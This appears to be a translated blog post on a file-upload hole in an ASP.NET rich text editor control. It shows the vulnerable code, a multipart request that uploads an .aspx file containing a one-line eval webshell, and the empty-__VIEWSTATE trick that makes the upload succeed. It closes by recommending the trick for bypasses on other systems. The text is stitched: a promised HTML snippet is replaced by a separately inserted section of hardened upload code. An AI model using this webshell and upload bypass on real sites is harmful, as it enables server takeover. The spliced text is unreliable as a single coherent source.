A Rich Text Editor File Upload Vulnerability (on how to control the IsPostBack value)

Source: Internet
Author: User

The Amir Rich Text Editor is actually a small product. Let's use it to look at how the IsPostBack value in .NET can be controlled.

In this editor you can upload a file directly without using any button (the only insert-file upload button does not work), because the code contains a hidden upload path:


```csharp
using System;
using System.IO;
using System.Web;
using System.Web.UI;

// Vulnerable code as described in the post: every file in the multipart request
// is written to ~/Uploads/ as soon as the request counts as a postback.
protected override void RenderContents(HtmlTextWriter output)
{
    if (this.Page.IsPostBack) // determines whether this is the first visit; this is the key point
    {
        // If there are uploaded files, save each one under ~/Uploads/ with its client-supplied name
        HttpFileCollection UploadFile = this.Page.Request.Files;
        for (int i = 0; i < UploadFile.Count; i++)
        {
            HttpPostedFile file = UploadFile[i];
            string FileName = Path.GetFileName(file.FileName);
            string StrPath = this.Page.MapPath("~/Uploads/");
            try
            {
                file.SaveAs(Path.Combine(StrPath, FileName));
            }
            catch (DirectoryNotFoundException DirectoryNullException)
            {
                output.Write(DirectoryNullException.Message);
            }
        }
    }
    Page.ClientScript.GetPostBackEventReference(this.Page, string.Empty);
    HtmlSourceInitializer.InitializeHtmlSource(this.Page);
    output.Write(HtmlSourceInitializer.RichTextHtmlSource.ToString());
}
```



RenderContents is the method that is called automatically when a custom control is rendered; this editor overrides it directly.

this.Page.IsPostBack indicates whether the page is being accessed for the first time (false) or is being posted back (true).

For more information, see:

http://msdn.microsoft.com/zh-cn/library/system.web.ui.page.ispostback.aspx

Therefore, controlling the IsPostBack value is the key to whether the file upload succeeds.

So let's first consider whether there is a general way to make IsPostBack true (if it is true, we can upload files).

First, try uploading with a plain HTML form:

```html
<html>
<form action="http://1/Default.aspx" name="test" method="post" enctype="multipart/form-data">
<input type="file" name="file" size="23" id="file"/>
<input type="submit" value="Submit"/>
</form>
</html>
```

After submitting, no file appears in the folder:
So it is certain that when files are uploaded directly in this way, IsPostBack is not true.



Next, use the built-in demo, which has a "get data" button, and click it:

We can see that a lot of data is submitted automatically; the part that inserts the file is:


```http
Content-Disposition: form-data; name="file"; filename="a.aspx"
Content-Type: application/xml

<%@ Page Language="Jscript"%><%eval(Request.Item["w"],"unsafe");%>ai
```



Strip everything else and keep only the __VIEWSTATE field and the file part:


```http
------WebKitFormBoundaryI4bps9FYvWWWngDb
Content-Disposition: form-data; name="__VIEWSTATE"

/wEPDwUKMjEyNTk0Njc3Ng9kFgRmDxYCHglpbm5lcmh0bWwFqAQ8dGl0bGU+S3VsZWguY29tPC90aXRsZT48bGluayByZWw9J3N0eWxlc2hlZXQnIHR5cGU9J3RleHQvY3NzJyBocmVmPScvV2ViUmVzb3VyY2UuYXhkP2Q9VE54b2cyVGt0YzA1aFdidHg3OXpBOG5UbWEyWEhUSmxrNkozSV9OUWhmVjRpeVNIcnhvRHJNSXVjSEFlTl9fd25Fb3cyMGM0VGQwWmhIeWtJcDd2S2cyJnQ9NjM0OTcxMjg4NjU2MDgyOTcwJyAvPjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgdHlwZT0ndGV4dC9jc3MnIGhyZWY9Jy9XZWJSZXNvdXJjZS5heGQ/ZD1UTnhvZzJUa3RjMDVoV2J0eDc5ekE4blRtYTJYSFRKbGs2SjNJX05RaGZWaVlLUGtBdUJJQUVteFFKU1ozejZwM0VvdVExZThWU3o2anJIODEtLU1YZzImdD02MzQ5NzEyODg2NTYwODI5NzAnIC8+PGxpbmsgcmVsPSdzdHlsZXNoZWV0JyB0eXBlPSd0ZXh0L2NzcycgaHJlZj0nL1dlYlJlc291cmNlLmF4ZD9kPVROeG9nMlRrdGMwNWhXYnR4Nzl6QThuVG1hMlhIVEpsazZKM0lfTlFoZlhpYnhrVk12RTB1WndQVi1NZmg5Ui1seWt1aHVfczFGQ0tDNGRmbk12cGl3MiZ0PTYzNDk3MTI4ODY1NjA4Mjk3MCcgLz5kAgEPFgIeB2VuY3R5cGUFE211bHRpcGFydC9mb3JtLWRhdGFkZH1GEi58juKz50rMm0Z+FcD3dEUs
------WebKitFormBoundaryI4bps9FYvWWWngDb
Content-Disposition: form-data; name="file"; filename="a.aspx"
Content-Type: application/xml

<%@ Page Language="Jscript"%><%eval(Request.Item["w"],"unsafe");%>ai
------WebKitFormBoundaryI4bps9FYvWWWngDb--
```

With this request, the file is uploaded successfully:
First, decode the __VIEWSTATE to check whether it contains a value such as IsPostBack = true:
After careful comparison, no IsPostBack = true is found in it.

Clear the viewstate, so that __VIEWSTATE is sent empty (viewstate = null):

The file is still uploaded successfully:
Therefore, according to this analysis, one condition for IsPostBack = true is that the __VIEWSTATE parameter exists in the request. As long as the viewstate is either valid or empty, IsPostBack is true (do not forge it with arbitrary content: an invalid viewstate makes the server return an error, HTTP 500).

In summary, when IsPostBack needs to be true: as long as the request carries a controllable __VIEWSTATE value that does not cause an error, the server automatically decides that this is not your first visit to the page. HTML code similar to the following can be used to solve the problem:
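The lesson of the analysis above is that IsPostBack only records that the request carried a __VIEWSTATE field, which any client can arrange, so it must never act as the gate for a file write. The following is an added example (not the editor's own code, nor the fix its author shipped) of how the RenderContents upload path could be hardened: the upload is tied to an explicit action field and an authenticated user, the file name is checked against an extension allowlist, the stored name is generated by the server, and the destination is kept under App_Data, which IIS does not serve. The class name RichTextEditorControl, the field name __rte_upload, the allowlist and the size limit are assumptions for illustration; HtmlSourceInitializer is taken from the original control's rendering code.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Web;
using System.Web.UI;

// Added example: hardened upload handling for the editor control described above.
// RichTextEditorControl, UploadActionFieldName, AllowedExtensions and MaxUploadBytes
// are assumptions for illustration; HtmlSourceInitializer is the original control's helper.
public class RichTextEditorControl : Control
{
    // Explicit form field that the editor's own insert-file action sets. Its presence,
    // not IsPostBack, is what the control treats as "the user asked to upload".
    private const string UploadActionFieldName = "__rte_upload";
    private const int MaxUploadBytes = 2 * 1024 * 1024;

    // Only file types the editor is meant to insert are accepted (assumed list).
    private static readonly HashSet<string> AllowedExtensions =
        new HashSet<string>(StringComparer.OrdinalIgnoreCase) { ".png", ".jpg", ".jpeg", ".gif", ".pdf" };

    protected override void RenderContents(HtmlTextWriter output)
    {
        HttpRequest request = this.Page.Request;

        // 1. Require an authenticated user and the explicit upload action. A request that
        //    merely contains an (empty or valid) __VIEWSTATE does not pass this test.
        bool uploadRequested = request.Form[UploadActionFieldName] == "1";
        if (uploadRequested && request.IsAuthenticated)
        {
            HttpFileCollection files = request.Files;
            string uploadRoot = this.Page.MapPath("~/App_Data/Uploads/"); // App_Data is never served by IIS
            for (int i = 0; i < files.Count; i++)
            {
                string savedAs;
                if (TrySaveUpload(files[i], uploadRoot, out savedAs))
                    output.Write(HttpUtility.HtmlEncode("stored " + savedAs));
                else
                    output.Write("upload rejected");
            }
        }

        Page.ClientScript.GetPostBackEventReference(this.Page, string.Empty);
        HtmlSourceInitializer.InitializeHtmlSource(this.Page);
        output.Write(HtmlSourceInitializer.RichTextHtmlSource.ToString());
    }

    // Validates one uploaded file and stores it under a server-generated name.
    // Returns false, and writes nothing to disk, if any check fails.
    public static bool TrySaveUpload(HttpPostedFile file, string uploadRoot, out string savedName)
    {
        savedName = null;
        if (file == null || file.ContentLength <= 0 || file.ContentLength > MaxUploadBytes)
            return false;

        // 2. Extension allowlist on the client-supplied name; "a.aspx" from the post is rejected here.
        string ext = Path.GetExtension(Path.GetFileName(file.FileName));
        if (string.IsNullOrEmpty(ext) || !AllowedExtensions.Contains(ext))
            return false;

        // 3. Server-chosen name: no client-controlled path component or extension reaches the disk.
        savedName = Guid.NewGuid().ToString("N") + ext.ToLowerInvariant();
        string rootFull = Path.GetFullPath(uploadRoot);
        string fullPath = Path.GetFullPath(Path.Combine(rootFull, savedName));

        // 4. Defensive check that the final path is still inside the upload root.
        if (!fullPath.StartsWith(rootFull, StringComparison.OrdinalIgnoreCase))
            return false;

        Directory.CreateDirectory(rootFull);
        file.SaveAs(fullPath);
        return true;
    }
}
```

The design choice worth noting is the separation of "is this a postback" from "is this an authorised upload": IsPostBack is a page-lifecycle flag, and the post shows it is satisfied by an empty __VIEWSTATE, so an upload must be authorised by something the client cannot trivially supply (authentication plus an explicit action). As defence in depth, a directory that must remain web-accessible for uploads should additionally carry its own web.config that restricts the IIS handler access policy to Read, so that even a file that slips past validation is served as static content rather than executed.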

Some useful tips can also be drawn from these vulnerabilities, and I hope you benefit from them. This point may also apply to many other systems and be very effective (for example, for some bypasses).

Solution: enhanced verification.
